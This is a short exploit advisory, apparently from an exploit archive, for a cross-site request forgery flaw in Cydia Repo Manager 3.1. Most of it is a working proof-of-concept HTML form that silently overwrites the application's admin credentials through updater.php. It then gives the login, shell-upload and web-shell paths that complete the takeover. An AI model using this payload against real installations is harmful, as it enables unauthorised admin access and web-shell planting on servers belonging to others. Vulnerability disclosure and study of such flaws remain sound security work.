[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cydia Repo Manager CSRF Vulnerability
# Published : 2013-01-16
# Author :
# Previous Title : NConf 1.3 (detail.php detail_admin_items.php, id parameter) SQL Injection
# Next Title : Ultra Light Forum Persistant XSS Vulnerability
# Cydia Repo Manager CSRF Vulnerability
# By cr4wl3r http://bastardlabs.info
# http://bastardlabs.info/exploits/Cydia_Repo_Manager.txt
# Software Link: http://damarist.de/?lang=en
# Download : http://damar1st.de/downloads/CydiaRepoManager3.1.zip
# Tested: Win 7
Proof of concept:
<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>
Login : http://bastardlabs/[CydiaRepoManager_path]/index.php
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php
Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png